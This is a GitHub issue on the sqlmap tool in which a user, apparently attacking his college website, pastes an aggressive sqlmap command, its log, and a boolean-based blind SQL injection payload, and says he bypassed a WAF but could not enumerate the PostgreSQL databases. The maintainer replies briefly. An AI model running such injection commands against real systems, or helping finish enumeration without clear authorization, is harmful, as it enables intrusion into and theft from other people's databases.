unable to retrieve the database names #4375
Labels
Comments
|
Please assess your target manually |
|
thanks a lot sir .. I appreciate your rep in such a short notice .. though i tried manual injection but no luck with the http error (500) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Describe the bug
I'm trying to exploits a url and i done almost every thing possible ( at least i know ) but no luck .. sqlmap seems unable to get the database name cuz of something i dunno
To Reproduce
C:\sqlmap>sqlmap.py -r r.txt --dbs --risk 3 --level 5 --random-agent --dbms PostgreSQL -t traffic.txt
___
H
___ [.]__ ___ ___ {1.4.9.22#dev}
|_ -| . ['] | .'| . |
|| [(]|||__,| |
||V... || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:56:45 /2020-10-11/
[16:56:45] [INFO] parsing HTTP request from 'r.txt'
[16:56:46] [INFO] setting file for logging HTTP traffic
[16:56:46] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1' from file 'C:\sqlmap\data\txt\user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
Cookie parameter 'CFTOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]
[16:56:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: http://host/fragentid=717 OR NOT 2028=2028-- gGzU111111
[16:56:51] [INFO] testing PostgreSQL
[16:56:51] [INFO] confirming PostgreSQL
[16:56:51] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[16:56:51] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[16:56:51] [INFO] fetching database (schema) names
[16:56:51] [INFO] fetching number of databases
[16:56:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:56:51] [INFO] retrieved:
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n]
[16:56:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:56:54] [ERROR] unable to retrieve the number of databases
[16:56:54] [INFO] falling back to current database
[16:56:54] [INFO] fetching current database
[16:56:54] [INFO] retrieved:
[16:57:11] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[16:57:11] [CRITICAL] unable to retrieve the database nam
Expected behavior
get the database name (100% there is an injection and i get bypassed the waf )
Running environment:
Target details:
Additional context
am scanning my collage website for a challenge award and almost there except this error occurred
The text was updated successfully, but these errors were encountered: